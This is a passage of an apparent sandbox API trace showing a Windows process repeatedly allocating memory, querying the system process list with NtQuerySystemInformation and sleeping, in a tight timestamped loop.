BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0147.906] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0147.906] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0147.908] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0147.909] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0147.920] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0147.924] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0147.924] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0147.924] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0147.925] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0147.927] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0147.927] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0147.935] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0147.935] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0147.936] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0147.936] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0147.937] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0147.939] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0147.939] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0147.956] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0147.956] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0147.957] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0147.963] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0147.964] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0147.966] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0147.967] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0147.982] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0147.982] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0147.983] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0147.983] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0147.983] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0147.986] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0147.987] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0147.999] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.000] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.000] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.001] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.001] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.003] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.004] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.013] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.013] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.014] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.014] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.014] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.017] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.018] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.029] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.029] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.030] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.030] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.030] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.033] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.034] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.045] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.045] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.045] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.046] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.046] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.048] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.049] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.063] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.063] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.064] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.064] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.064] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.066] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.067] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.075] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.076] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.076] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.076] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.077] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.078] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.079] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.091] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.091] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.092] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.092] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.092] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.094] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.095] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.121] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.122] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.122] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.122] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.123] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.124] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.125] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.138] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.138] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.139] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.140] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.140] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.142] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.143] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.153] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.154] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.154] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.154] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.155] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.157] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.157] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.169] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.169] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.170] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.170] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.170] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.173] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.173] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.185] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.185] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.186] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.186] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.186] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.188] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.188] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.200] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.201] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.201] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.202] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.202] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.206] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.207] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.216] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.216] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.217] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.217] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.217] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.219] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.219] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.232] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.233] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.234] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.234] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.234] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.237] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.237] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.247] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.248] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.248] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.248] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.249] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.251] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.251] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.263] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.263] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.264] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.264] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 